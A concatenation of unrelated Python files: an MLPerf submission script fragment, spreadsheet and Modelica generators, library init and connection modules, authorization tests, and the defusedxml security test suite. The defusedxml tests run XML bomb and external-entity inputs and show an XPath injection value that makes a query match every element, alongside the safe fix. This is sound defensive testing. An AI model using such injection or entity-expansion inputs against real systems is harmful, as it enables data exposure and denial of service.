good=38221, total=50000". accuracy_line = accuracy_txt[-1] match = re.match('accuracy=(.+)%, good=(\d+), total=(\d+)', accuracy_line) accuracy_pc = float(match.group(1)) elif task == 'object-detection': accuracy_coco_py = os.path.join(upstream_path, 'v0.5', 'classification_and_detection', 'tools', 'accuracy-coco.py') # os.environ['PYTHONPATH'] = pythonpath_coco+':'+os.environ.get('PYTHONPATH','') accuracy_txt = get_ipython().getoutput('python3 $accuracy_coco_py --coco-dir $coco_dir --mlperf-accuracy-file $accuracy_json_path') # The last line is e.g. "mAP=13.323%". accuracy_line = accuracy_txt[-1] match = re.match('mAP\=([\d\.]+)\%', accuracy_line) accuracy_pc = float(match.group(1)) else: raise "Invalid task '%s'!" % task with open(accuracy_txt_path, 'w') as accuracy_txt_file: accuracy_txt_file.writelines('\n'.join(accuracy_txt)) print(' |_ %s [%.3f%% parsed from "%s"]' % (accuracy_txt_name, accuracy_pc, accuracy_line)) # Generate submission_checklist.txt for each system, benchmark and scenario under "measurements/". if mode == 'accuracy' and not audit: checklist_name = 'submission_checklist.txt' checklist_path = os.path.join(measurements_dir, system, benchmark, scenario, checklist_name) system_json = division_systems.get(division_system, default_system_json) # Extract LoadGen revision from the second line of e.g. # "pid": 28660, "tid": 28660, "ts": 8750ns : version : .5a1 @ 61220457de # FIXME: In practice, the revision may be different for accuracy and performance runs # (happened on rpi4 due to a late LoadGen fix). We would prefer to use one from # the performance one, as it may be more critical for performance evaluation. # However, as we only write the checklist from the accuracy run, we are somewhat stuck. loadgen_revision = detail[1].split('@')[1].strip() # FIXME: The actual performance_sample_count can be extracted from the performance run. # Again, this is not available to us here. # We could check in user.conf, but we would need to parse it. performance_sample_count = 1024 if task == 'image-classification' else 256 # Write the checklist. if division == 'open' and task == 'object-detection': # Collaboration between dividiti and Politecnico di Milano. print(system) checklist = get_checklist(name='Anton Lokhmotov; Emanuele Vitali', email='anton@dividiti.com; emanuele.vitali@polimi.it', division=division, task=task, system=system, system_name=system_json['system_name'], category=system_json['status'], revision=loadgen_revision, benchmark=benchmark, accuracy_pc=accuracy_pc, performance_sample_count=performance_sample_count, numerics=implementation_benchmark_json['weight_data_types']) else: checklist = get_checklist(division=division, task=task, system=system, system_name=system_json['system_name'], category=system_json['status'], revision=loadgen_revision, benchmark=benchmark, accuracy_pc=accuracy_pc, performance_sample_count=performance_sample_count, numerics=implementation_benchmark_json['weight_data_types']) with open(checklist_path, 'w') as checklist_file: checklist_file.writelines(checklist) # # Trace file (should omit trace from v0.5). # trace_json_name = 'mlperf_log_trace.json' # trace_json_path = os.path.join(last_dir, trace_json_name) # with open(trace_json_path, 'w') as trace_json_file: # json.dump(mlperf_log.get('trace',{}), trace_json_file, indent=2) return repo = os.environ.get('CK_MLPERF_SUBMISSION_REPO','') repos = [ repo ] if repo != '' else [] for repo_uoa in repos: check_experimental_results(repo_uoa, audit=False) submitter = os.environ.get('CK_MLPERF_SUBMISSION_SUBMITTER','dividiti') # ### Extract audit repos # In[ ]: # # audit_repos = repos_image_classification_closed_audit + repos_image_classification_open_audit # audit_repos = [ 'mlperf.closed.image-classification.mate10pro.audit' ] # for repo_uoa in audit_repos: # check_experimental_results(repo_uoa, path=path, submitter=submitter, audit=True) # ### Run submission checker # In[ ]: print("*" * 100) submission_checker_py = os.path.join(upstream_path, 'v0.5', 'tools', 'submission', 'submission-checker.py') # The checker has a weird bug. When submitting to open, 'closed/<organization>/results' must exist on disk. # Vice versa, When submitting to closed, 'open/<organization>/results' must exist on disk. # Therefore, create both directories if they do not exist before invoking the checker. open_org_results_dir = os.path.join(root_dir, 'open', submitter, 'results') closed_org_results_dir = os.path.join(root_dir, 'closed', submitter, 'results') get_ipython().system('mkdir -p $open_org_results_dir') get_ipython().system('mkdir -p $closed_org_results_dir') # Run the checker. checker_log = get_ipython().getoutput('python3 $submission_checker_py --input $root_dir --submitter $submitter') checker_log = "\n".join(checker_log) print(checker_log) checker_log_name = 'compliance_checker_log.txt' # Write the checker results once closed/<organization> and once under open/<organization>. for results_dir in [ open_org_results_dir, closed_org_results_dir ]: checker_log_path = os.path.join(results_dir, checker_log_name) with open(checker_log_path, 'w') as checker_log_file: checker_log_file.writelines(checker_log) print(results_dir) print(' |_%s' % checker_log_name)
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import absolute_import from openpyxl import Workbook from openpyxl import load_workbook finally_filename = 'aftercopy_book.xlsx' origin_filename = 'origin_book.xlsx' read_wb = load_workbook(filename = origin_filename) sheet_names = read_wb.get_sheet_names() ws1=read_wb[sheet_names[0]] ws2 = read_wb.create_sheet(title="copy_data") for row_idx,row in enumerate(ws1.rows): for col_idx, cell in enumerate(row): _ = ws2.cell(column=1, row=row_idx+1, value="%s" % (cell.value)) read_wb.save(filename = finally_filename)
size_x = 3 size_y = 3 size_z = 3 modelname = "generic_satellite_var_rad_optical_properties_"+str(size_x)+"x"+str(size_y)+"x"+str(size_z) #modelname = "generic_satellite_optical_properties_"+str(size_x)+"x"+str(size_y)+"x"+str(size_z) import_to_model = ["iboss.*","iboss.illumination.*"] parameter =["illumination.LEO.Strahlungsleistung_3x3x3_LEO_EnMap_SunPointing orbit_illumination"] BB=[] connection_element=[] conncet=[] env=[] orientation=["xn","xp","yn","yp","zn","zp"] orientation_env=["nX","pX","nY","pY","nZ","pZ"] filename = '"E:\\\Eigene Dateien\\\iBOSS-2\\\Gesamtsimulation_TuE\\\ibosssim\\\model\\\iboss\\\thermochrom_alpha_epsilon.txt"' #filename = '"/home/jens/iBOSS2/Simulation_Linux/ibosssim/model/iboss/thermochrom_alpha_epsilon.txt"' i=1 while i<=size_x: j=1 while j<=size_y: k=1 while k<=size_z: BB.append(" iboss_thermal.buildingblocks.BuildingBlock_optical_properties_var_rad BB"+str(i)+str(j)+str(k)+"(Panel_xp(combiTable1Ds1(fileName = "+ str(filename) + ")), Panel_xn(combiTable1Ds1(fileName = "+ str(filename) + ")), Panel_yp(combiTable1Ds1(fileName = "+ str(filename) + ")), Panel_yn(combiTable1Ds1(fileName = "+ str(filename) + ")), Panel_zn(combiTable1Ds1(fileName = "+ str(filename) + ")), Panel_zp(combiTable1Ds1(fileName = "+ str(filename) + ")));") #BB.append(" iboss_thermal.buildingblocks.BuildingBlock_optical_properties BB"+str(i)+str(j)+str(k)+";") l=0 while l<=len(orientation)-1: env.append(" iboss_thermal.components.environment_optical_properties BB"+str(i)+str(j)+str(k)+str(orientation_env[l])+"(illumination=orbit_illumination.BB"+str(i)+str(j)+str(k)+str(orientation_env[l])+");") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+str(orientation_env[l])+".thermal_connector_env,BB"+str(i)+str(j)+str(k)+".thermal_connector_"+str(orientation[l])+");") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+str(orientation_env[l])+".panel_surface1,BB"+str(i)+str(j)+str(k)+".panel_surface_"+str(orientation[l])+");") l=l+1 if i>1: connection_element.append(" iboss_thermal.components.thermal_TIM_optical_properties TIM_BB"+str(i-1)+str(j)+str(k)+"_BB"+str(i)+str(j)+str(k)+";") conncet.append(" connect(BB"+str(i-1)+str(j)+str(k)+".thermal_connector_xp,TIM_BB"+str(i-1)+str(j)+str(k)+"_BB"+str(i)+str(j)+str(k)+".thermal_connector2);") conncet.append(" connect(BB"+str(i-1)+str(j)+str(k)+".panel_surface_xp,TIM_BB"+str(i-1)+str(j)+str(k)+"_BB"+str(i)+str(j)+str(k)+".panel_surface2);") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+".thermal_connector_xn,TIM_BB"+str(i-1)+str(j)+str(k)+"_BB"+str(i)+str(j)+str(k)+".thermal_connector1);") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+".panel_surface_xn,TIM_BB"+str(i-1)+str(j)+str(k)+"_BB"+str(i)+str(j)+str(k)+".panel_surface1);") if j>1: connection_element.append(" iboss_thermal.components.thermal_TIM_optical_properties TIM_BB"+str(i)+str(j-1)+str(k)+"_BB"+str(i)+str(j)+str(k)+";") conncet.append(" connect(BB"+str(i)+str(j-1)+str(k)+".thermal_connector_yp,TIM_BB"+str(i)+str(j-1)+str(k)+"_BB"+str(i)+str(j)+str(k)+".thermal_connector2);") conncet.append(" connect(BB"+str(i)+str(j-1)+str(k)+".panel_surface_yp,TIM_BB"+str(i)+str(j-1)+str(k)+"_BB"+str(i)+str(j)+str(k)+".panel_surface2);") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+".thermal_connector_yn,TIM_BB"+str(i)+str(j-1)+str(k)+"_BB"+str(i)+str(j)+str(k)+".thermal_connector1);") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+".panel_surface_yn,TIM_BB"+str(i)+str(j-1)+str(k)+"_BB"+str(i)+str(j)+str(k)+".panel_surface1);") if k>1: connection_element.append(" iboss_thermal.components.thermal_TIM_optical_properties TIM_BB"+str(i)+str(j)+str(k-1)+"_BB"+str(i)+str(j)+str(k)+";") conncet.append(" connect(BB"+str(i)+str(j)+str(k-1)+".thermal_connector_zp,TIM_BB"+str(i)+str(j)+str(k-1)+"_BB"+str(i)+str(j)+str(k)+".thermal_connector2);") conncet.append(" connect(BB"+str(i)+str(j)+str(k-1)+".panel_surface_zp,TIM_BB"+str(i)+str(j)+str(k-1)+"_BB"+str(i)+str(j)+str(k)+".panel_surface2);") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+".thermal_connector_zn,TIM_BB"+str(i)+str(j)+str(k-1)+"_BB"+str(i)+str(j)+str(k)+".thermal_connector1);") conncet.append(" connect(BB"+str(i)+str(j)+str(k)+".panel_surface_zn,TIM_BB"+str(i)+str(j)+str(k-1)+"_BB"+str(i)+str(j)+str(k)+".panel_surface1);") k=k+1 j=j+1 i=i+1 modelica_obj = open(modelname+".mo","w") print("model "+ modelname) modelica_obj.write("model "+ modelname + "\n") i=0 while i<=len(import_to_model)-1: print(" import "+ import_to_model[i] + ";") modelica_obj.write(" import "+ import_to_model[i] + ";" + "\n") i=i+1 i=0 while i<=len(parameter)-1: print(" parameter "+ parameter[i] + ";") modelica_obj.write(" parameter "+ parameter[i] + ";" + "\n") i=i+1 i=0 while i<=len(BB)-1: print(BB[i]) modelica_obj.write(BB[i]+ "\n") i=i+1 i=0 while i<=len(connection_element)-1: print(connection_element[i]) modelica_obj.write(connection_element[i] + "\n") i=i+1 i=0 while i<=len(env)-1: print(env[i]) modelica_obj.write(env[i] + "\n") i=i+1 i=0 print(" equation") modelica_obj.write(" equation" + "\n") while i<=len(conncet)-1: print(conncet[i]) modelica_obj.write(conncet[i] + "\n") i=i+1 print("end " + modelname + ";") modelica_obj.write("end " + modelname + ";" + "\n") modelica_obj.close()
from __future__ import print_function import os import sys import unittest import io import re from xml.sax.saxutils import XMLGenerator from xml.sax import SAXParseException from pyexpat import ExpatError from defusedxml import cElementTree, ElementTree, minidom, pulldom, sax, xmlrpc from defusedxml import defuse_stdlib from defusedxml import (DefusedXmlException, DTDForbidden, EntitiesForbidden, ExternalReferenceForbidden, NotSupportedError) from defusedxml.common import PY3, PY26, PY31 try: import gzip except ImportError: gzip = None try: from defusedxml import lxml from lxml.etree import XMLSyntaxError LXML3 = lxml.LXML3 except ImportError: lxml = None XMLSyntaxError = None LXML3 = False HERE = os.path.dirname(os.path.abspath(__file__)) # prevent web access # based on Debian's rules, Port 9 is discard os.environ["http_proxy"] = "http://127.0.9.1:9" os.environ["https_proxy"] = os.environ["http_proxy"] os.environ["ftp_proxy"] = os.environ["http_proxy"] if PY26 or PY31: class _AssertRaisesContext(object): def __init__(self, expected, test_case, expected_regexp=None): self.expected = expected self.failureException = test_case.failureException self.expected_regexp = expected_regexp def __enter__(self): return self def __exit__(self, exc_type, exc_value, tb): if exc_type is None: try: exc_name = self.expected.__name__ except AttributeError: exc_name = str(self.expected) raise self.failureException( "{0} not raised".format(exc_name)) if not issubclass(exc_type, self.expected): # let unexpected exceptions pass through return False self.exception = exc_value # store for later retrieval if self.expected_regexp is None: return True expected_regexp = self.expected_regexp if isinstance(expected_regexp, basestring): expected_regexp = re.compile(expected_regexp) if not expected_regexp.search(str(exc_value)): raise self.failureException('"%s" does not match "%s"' % (expected_regexp.pattern, str(exc_value))) return True class DefusedTestCase(unittest.TestCase): if PY3: content_binary = False else: content_binary = True xml_dtd = os.path.join(HERE, "xmltestdata", "dtd.xml") xml_external = os.path.join(HERE, "xmltestdata", "external.xml") xml_external_file = os.path.join(HERE, "xmltestdata", "external_file.xml") xml_quadratic = os.path.join(HERE, "xmltestdata", "quadratic.xml") xml_simple = os.path.join(HERE, "xmltestdata", "simple.xml") xml_simple_ns = os.path.join(HERE, "xmltestdata", "simple-ns.xml") xml_bomb = os.path.join(HERE, "xmltestdata", "xmlbomb.xml") xml_bomb2 = os.path.join(HERE, "xmltestdata", "xmlbomb2.xml") xml_cyclic = os.path.join(HERE, "xmltestdata", "cyclic.xml") if PY26 or PY31: # old Python versions don't have these useful test methods def assertRaises(self, excClass, callableObj=None, *args, **kwargs): context = _AssertRaisesContext(excClass, self) if callableObj is None: return context with context: callableObj(*args, **kwargs) def assertIn(self, member, container, msg=None): if member not in container: standardMsg = '%s not found in %s' % (repr(member), repr(container)) self.fail(self._formatMessage(msg, standardMsg)) def get_content(self, xmlfile): mode = "rb" if self.content_binary else "r" with io.open(xmlfile, mode) as f: data = f.read() return data class BaseTests(DefusedTestCase): module = None dtd_external_ref = False external_ref_exception = ExternalReferenceForbidden cyclic_error = None iterparse = None def test_simple_parse(self): self.parse(self.xml_simple) self.parseString(self.get_content(self.xml_simple)) if self.iterparse: self.iterparse(self.xml_simple) def test_simple_parse_ns(self): self.parse(self.xml_simple_ns) self.parseString(self.get_content(self.xml_simple_ns)) if self.iterparse: self.iterparse(self.xml_simple_ns) def test_entities_forbidden(self): self.assertRaises(EntitiesForbidden, self.parse, self.xml_bomb) self.assertRaises(EntitiesForbidden, self.parse, self.xml_quadratic) self.assertRaises(EntitiesForbidden, self.parse, self.xml_external) self.assertRaises(EntitiesForbidden, self.parseString, self.get_content(self.xml_bomb)) self.assertRaises(EntitiesForbidden, self.parseString, self.get_content(self.xml_quadratic)) self.assertRaises(EntitiesForbidden, self.parseString, self.get_content(self.xml_external)) if self.iterparse: self.assertRaises(EntitiesForbidden, self.iterparse, self.xml_bomb) self.assertRaises(EntitiesForbidden, self.iterparse, self.xml_quadratic) self.assertRaises(EntitiesForbidden, self.iterparse, self.xml_external) def test_entity_cycle(self): self.assertRaises(self.cyclic_error, self.parse, self.xml_cyclic, forbid_entities=False) def test_dtd_forbidden(self): self.assertRaises(DTDForbidden, self.parse, self.xml_bomb, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parse, self.xml_quadratic, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parse, self.xml_external, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parse, self.xml_dtd, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_bomb), forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_quadratic), forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_external), forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_dtd), forbid_dtd=True) if self.iterparse: self.assertRaises(DTDForbidden, self.iterparse, self.xml_bomb, forbid_dtd=True) self.assertRaises(DTDForbidden, self.iterparse, self.xml_quadratic, forbid_dtd=True) self.assertRaises(DTDForbidden, self.iterparse, self.xml_external, forbid_dtd=True) self.assertRaises(DTDForbidden, self.iterparse, self.xml_dtd, forbid_dtd=True) def test_dtd_with_external_ref(self): if self.dtd_external_ref: self.assertRaises(self.external_ref_exception, self.parse, self.xml_dtd) else: self.parse(self.xml_dtd) def test_external_ref(self): self.assertRaises(self.external_ref_exception, self.parse, self.xml_external, forbid_entities=False) def test_external_file_ref(self): content = self.get_content(self.xml_external_file) if isinstance(content, bytes): here = HERE.encode(sys.getfilesystemencoding()) content = content.replace(b"/PATH/TO", here) else: content = content.replace("/PATH/TO", HERE) self.assertRaises(self.external_ref_exception, self.parseString, content, forbid_entities=False) def test_allow_expansion(self): self.parse(self.xml_bomb2, forbid_entities=False) self.parseString(self.get_content(self.xml_bomb2), forbid_entities=False) class TestDefusedElementTree(BaseTests): module = ElementTree ## etree doesn't do external ref lookup #external_ref_exception = ElementTree.ParseError cyclic_error = ElementTree.ParseError def parse(self, xmlfile, **kwargs): tree = self.module.parse(xmlfile, **kwargs) return self.module.tostring(tree.getroot()) def parseString(self, xmlstring, **kwargs): tree = self.module.fromstring(xmlstring, **kwargs) return self.module.tostring(tree) def iterparse(self, source, **kwargs): return list(self.module.iterparse(source, **kwargs)) class TestDefusedcElementTree(TestDefusedElementTree): module = cElementTree class TestDefusedMinidom(BaseTests): module = minidom cyclic_error = ExpatError iterparse = None def parse(self, xmlfile, **kwargs): doc = self.module.parse(xmlfile, **kwargs) return doc.toxml() def parseString(self, xmlstring, **kwargs): doc = self.module.parseString(xmlstring, **kwargs) return doc.toxml() class TestDefusedPulldom(BaseTests): module = pulldom cyclic_error = SAXParseException dtd_external_ref = True def parse(self, xmlfile, **kwargs): events = self.module.parse(xmlfile, **kwargs) return list(events) def parseString(self, xmlstring, **kwargs): events = self.module.parseString(xmlstring, **kwargs) return list(events) class TestDefusedSax(BaseTests): module = sax cyclic_error = SAXParseException content_binary = True dtd_external_ref = True def parse(self, xmlfile, **kwargs): if PY3: result = io.StringIO() else: result = io.BytesIO() handler = XMLGenerator(result) self.module.parse(xmlfile, handler, **kwargs) return result.getvalue() def parseString(self, xmlstring, **kwargs): if PY3: result = io.StringIO() else: result = io.BytesIO() handler = XMLGenerator(result) self.module.parseString(xmlstring, handler, **kwargs) return result.getvalue() def test_exceptions(self): if PY26: # Python 2.6 unittest doesn't support with self.assertRaises() return with self.assertRaises(EntitiesForbidden) as ctx: self.parse(self.xml_bomb) msg = "EntitiesForbidden(name='a', system_id=None, public_id=None)" self.assertEqual(str(ctx.exception), msg) self.assertEqual(repr(ctx.exception), msg) with self.assertRaises(ExternalReferenceForbidden) as ctx: self.parse(self.xml_external, forbid_entities=False) msg = ("ExternalReferenceForbidden" "(system_id='http://www.w3schools.com/xml/note.xml', public_id=None)") self.assertEqual(str(ctx.exception), msg) self.assertEqual(repr(ctx.exception), msg) with self.assertRaises(DTDForbidden) as ctx: self.parse(self.xml_bomb, forbid_dtd=True) msg = "DTDForbidden(name='xmlbomb', system_id=None, public_id=None)" self.assertEqual(str(ctx.exception), msg) self.assertEqual(repr(ctx.exception), msg) class TestDefusedLxml(BaseTests): module = lxml cyclic_error = XMLSyntaxError content_binary = True def parse(self, xmlfile, **kwargs): tree = self.module.parse(xmlfile, **kwargs) return self.module.tostring(tree) def parseString(self, xmlstring, **kwargs): tree = self.module.fromstring(xmlstring, **kwargs) return self.module.tostring(tree) if not LXML3: def test_entities_forbidden(self): self.assertRaises(NotSupportedError, self.parse, self.xml_bomb) def test_dtd_with_external_ref(self): self.assertRaises(NotSupportedError, self.parse, self.xml_dtd) def test_external_ref(self): pass def test_external_file_ref(self): pass def test_restricted_element1(self): tree = self.module.parse(self.xml_bomb, forbid_dtd=False, forbid_entities=False) root = tree.getroot() self.assertEqual(root.text, None) self.assertEqual(list(root), []) self.assertEqual(root.getchildren(), []) self.assertEqual(list(root.iter()), [root]) self.assertEqual(list(root.iterchildren()), []) self.assertEqual(list(root.iterdescendants()), []) self.assertEqual(list(root.itersiblings()), []) self.assertEqual(list(root.getiterator()), [root]) self.assertEqual(root.getnext(), None) def test_restricted_element2(self): tree = self.module.parse(self.xml_bomb2, forbid_dtd=False, forbid_entities=False) root = tree.getroot() bomb, tag = root self.assertEqual(root.text, "text") self.assertEqual(list(root), [bomb, tag]) self.assertEqual(root.getchildren(), [bomb, tag]) self.assertEqual(list(root.iter()), [root, bomb, tag]) self.assertEqual(list(root.iterchildren()), [bomb, tag]) self.assertEqual(list(root.iterdescendants()), [bomb, tag]) self.assertEqual(list(root.itersiblings()), []) self.assertEqual(list(root.getiterator()), [root, bomb, tag]) self.assertEqual(root.getnext(), None) self.assertEqual(root.getprevious(), None) self.assertEqual(list(bomb.itersiblings()), [tag]) self.assertEqual(bomb.getnext(), tag) self.assertEqual(bomb.getprevious(), None) self.assertEqual(tag.getnext(), None) self.assertEqual(tag.getprevious(), bomb) def test_xpath_injection(self): # show XPath injection vulnerability xml = """<root><tag id="one" /><tag id="two"/></root>""" expr = "one' or @id='two" root = lxml.fromstring(xml) # insecure way xp = "tag[@id='%s']" % expr elements = root.xpath(xp) self.assertEqual(len(elements), 2) self.assertEqual(elements, list(root)) # proper and safe way xp = "tag[@id=$idname]" elements = root.xpath(xp, idname=expr) self.assertEqual(len(elements), 0) self.assertEqual(elements, []) elements = root.xpath(xp, idname="one") self.assertEqual(len(elements), 1) self.assertEqual(elements, list(root)[:1]) class XmlRpcTarget(object): def __init__(self): self._data = [] def __str__(self): return "".join(self._data) def xml(self, encoding, standalone): pass def start(self, tag, attrs): self._data.append("<%s>" % tag) def data(self, text): self._data.append(text) def end(self, tag): self._data.append("</%s>" % tag) class TestXmlRpc(DefusedTestCase): module = xmlrpc def parse(self, xmlfile, **kwargs): target = XmlRpcTarget() parser = self.module.DefusedExpatParser(target, **kwargs) data = self.get_content(xmlfile) parser.feed(data) parser.close() return target def parse_unpatched(self, xmlfile): target = XmlRpcTarget() parser = self.module.ExpatParser(target) data = self.get_content(xmlfile) parser.feed(data) parser.close() return target def test_xmlrpc(self): self.assertRaises(EntitiesForbidden, self.parse, self.xml_bomb) self.assertRaises(EntitiesForbidden, self.parse, self.xml_quadratic) self.parse(self.xml_dtd) self.assertRaises(DTDForbidden, self.parse, self.xml_dtd, forbid_dtd=True) #def test_xmlrpc_unpatched(self): # for fname in (self.xml_external, self.xml_dtd): # print(self.parse_unpatched(fname)) def test_monkeypatch(self): try: xmlrpc.monkey_patch() finally: xmlrpc.unmonkey_patch() class TestDefusedGzip(DefusedTestCase): def get_gzipped(self, length): f = io.BytesIO() gzf = gzip.GzipFile(mode="wb", fileobj=f) gzf.write(b"d" * length) gzf.close() f.seek(0) return f def decode_response(self, response, limit=None, readlength=1024): dec = xmlrpc.DefusedGzipDecodedResponse(response, limit) acc = [] while True: data = dec.read(readlength) if not data: break acc.append(data) return b"".join(acc) def test_defused_gzip_decode(self): data = self.get_gzipped(4096).getvalue() result = xmlrpc.defused_gzip_decode(data) self.assertEqual(result, b"d" *4096) result = xmlrpc.defused_gzip_decode(data, -1) self.assertEqual(result, b"d" *4096) result = xmlrpc.defused_gzip_decode(data, 4096) self.assertEqual(result, b"d" *4096) with self.assertRaises(ValueError): result = xmlrpc.defused_gzip_decode(data, 4095) with self.assertRaises(ValueError): result = xmlrpc.defused_gzip_decode(data, 0) def test_defused_gzip_response(self): clen = len(self.get_gzipped(4096).getvalue()) response = self.get_gzipped(4096) data = self.decode_response(response) self.assertEqual(data, b"d" *4096) with self.assertRaises(ValueError): response = self.get_gzipped(4096) xmlrpc.DefusedGzipDecodedResponse(response, clen - 1) with self.assertRaises(ValueError): response = self.get_gzipped(4096) self.decode_response(response, 4095) with self.assertRaises(ValueError): response = self.get_gzipped(4096) self.decode_response(response, 4095, 8192) def test_main(): suite = unittest.TestSuite() suite.addTests(unittest.makeSuite(TestDefusedcElementTree)) suite.addTests(unittest.makeSuite(TestDefusedElementTree)) suite.addTests(unittest.makeSuite(TestDefusedMinidom)) suite.addTests(unittest.makeSuite(TestDefusedPulldom)) suite.addTests(unittest.makeSuite(TestDefusedSax)) suite.addTests(unittest.makeSuite(TestXmlRpc)) if lxml is not None: suite.addTests(unittest.makeSuite(TestDefusedLxml)) if gzip is not None: suite.addTests(unittest.makeSuite(TestDefusedGzip)) return suite if __name__ == "__main__": suite = test_main() result = unittest.TextTestRunner(verbosity=1).run(suite) # TODO: test that it actually works defuse_stdlib() sys.exit(not result.wasSuccessful())
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE from __future__ import absolute_import import distutils.version # NumPy 1.13.1 introduced NEP13, without which Awkward ufuncs won't work, which # would be worse than lacking a feature: it would cause unexpected output. # NumPy 1.17.0 introduced NEP18, which is optional (use ak.* instead of np.*). import numpy if distutils.version.LooseVersion(numpy.__version__) < distutils.version.LooseVersion( "1.13.1" ): raise ImportError("Numpy 1.13.1 or later required") deprecations_as_errors = False # NumPy-like alternatives import awkward.nplike # shims for C++ (now everything is compiled into one 'awkward._ext' module) import awkward.layout import awkward.types import awkward.forms import awkward.partition # internal import awkward._cpu_kernels import awkward._libawkward import awkward._util # third-party connectors import awkward._connect._numpy import awkward._connect._numba import awkward._connect._numexpr import awkward._connect._autograd # high-level interface behavior = {} from awkward.highlevel import Array from awkward.highlevel import Record from awkward.highlevel import ArrayBuilder # third-party jax connectors import awkward._connect._jax # behaviors from awkward.behaviors.mixins import * from awkward.behaviors.string import * from awkward.behaviors.categorical import * # operations from awkward.operations.convert import * from awkward.operations.describe import * from awkward.operations.structure import * from awkward.operations.reducers import * # version __version__ = awkward._ext.__version__ # call C++ startup function awkward._ext.startup() __all__ = [ x for x in list(globals()) if not x.startswith("_") and x not in ("distutils", "numpy") ] def __dir__(): return __all__
__author__ = "Myles Dear <mdear@cisco.com>" from unicon.bases.routers.connection import BaseSingleRpConnection from unicon.bases.routers.connection import BaseDualRpConnection from unicon.plugins.iosxr.iosxrv.statemachine import IOSXRVSingleRpStateMachine from unicon.plugins.iosxr.iosxrv.statemachine import IOSXRVDualRpStateMachine from unicon.plugins.iosxr import IOSXRServiceList from unicon.plugins.iosxr import IOSXRHAServiceList from unicon.plugins.iosxr.iosxrv.connection_provider \ import IOSXRVSingleRpConnectionProvider from unicon.plugins.iosxr.iosxrv.connection_provider \ import IOSXRVDualRpConnectionProvider from unicon.plugins.iosxr.iosxrv.settings import IOSXRVSettings class IOSXRVSingleRpConnection(BaseSingleRpConnection): os = 'iosxr' platform = 'iosxrv' chassis_type = 'single_rp' state_machine_class = IOSXRVSingleRpStateMachine connection_provider_class = IOSXRVSingleRpConnectionProvider subcommand_list = IOSXRServiceList settings = IOSXRVSettings() class IOSXRVDualRpConnection(BaseDualRpConnection): os = 'iosxr' platform = 'iosxrv' chassis_type = 'dual_rp' state_machine_class = IOSXRVDualRpStateMachine connection_provider_class = IOSXRVDualRpConnectionProvider subcommand_list = IOSXRHAServiceList settings = IOSXRVSettings()
#!/usr/bin/env python # This work was created by participants in the DataONE project, and is # jointly copyrighted by participating institutions in DataONE. For # more information on DataONE, see our web site at http://dataone.org. # # Copyright 2009-2019 DataONE # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test authorization. Note: Does not test authentication. """ import pytest import responses import d1_common.types.exceptions import d1_gmn.tests.gmn_mock import d1_gmn.tests.gmn_test_case class TestAuthorization(d1_gmn.tests.gmn_test_case.GMNTestCase): def _create_default(self): """Create object with default access policy: 'subj1': 'read' 'subj2', 'subj3', 'subj4': 'read', 'write' 'subj5', 'subj6', 'subj7', 'subj8': 'read', 'changePermission' 'subj9', 'subj10', 'subj11', 'subj12': 'changePermission' """ return self.create_obj(self.client_v2, sid=True) def _get(self, pid, session_subj_list): with d1_gmn.tests.gmn_mock.set_auth_context( session_subj_list, ["trusted_subj"] ): self.client_v2.get(pid) @responses.activate def test_1000(self): """Attempted object read by single unknown subject raises NotAuthorized.""" pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default() with pytest.raises(d1_common.types.exceptions.NotAuthorized): self._get(pid, ["unk_subj"]) @responses.activate def test_1010(self): """Attempted object read by multiple unknown subjects raise NotAuthorized.""" pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default() with pytest.raises(d1_common.types.exceptions.NotAuthorized): self._get(pid, ["unk_subj", "subj2_", "_subj33", "subj12!"]) @responses.activate def test_1020(self): """Attempted object read by a single known subject allowed.""" pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default() self._get(pid, ["subj12"]) @responses.activate def test_1030(self): """Attempted object read by a single known subject is allowed even if there are also unknown subjects.""" pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default() self._get(pid, ["unk_subj", "subj2_", "_subj33", "subj12!", "subj1"])
import numpy as np from scipy import misc from interpolate_2D import interpolate_2D def rotate_z(points,theta): """Rotate an array of points theta degrees around the z-axis.""" theta = np.radians(theta) c, s = np.cos(theta), np.sin(theta) rotationMatrix = np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]]) return np.dot(points,rotationMatrix) def depth_to_point_cloud(imgHead, imgTail, imgLeft, imgRight, far, interpolate=False, threshold=1.0): """Returns a point cloud calculated from four depth map.""" # Read depth images and decode them head = decode_depthmap(imgHead, far) tail = decode_depthmap(imgTail, far) left = decode_depthmap(imgLeft, far) right = decode_depthmap(imgRight, far) # Get list of lidar ray angles and the coordinates in the image they intersect [coords, angles] = get_relevant_coordinates() x_coords, y_coords = coords[:,0], coords[:,1] n_points = len(x_coords) # Interpolate or get raw pixel values if interpolate: vHead = interpolate_2D(head, x_coords, y_coords, threshold) vTail = interpolate_2D(tail, x_coords, y_coords, threshold) vLeft = interpolate_2D(left, x_coords, y_coords, threshold) vRight = interpolate_2D(right, x_coords, y_coords, threshold) else: vHead = get_pixel_values(head, x_coords, y_coords) vTail = get_pixel_values(tail, x_coords, y_coords) vLeft = get_pixel_values(left, x_coords, y_coords) vRight = get_pixel_values(right, x_coords, y_coords) # Calculate 3D coordinates from 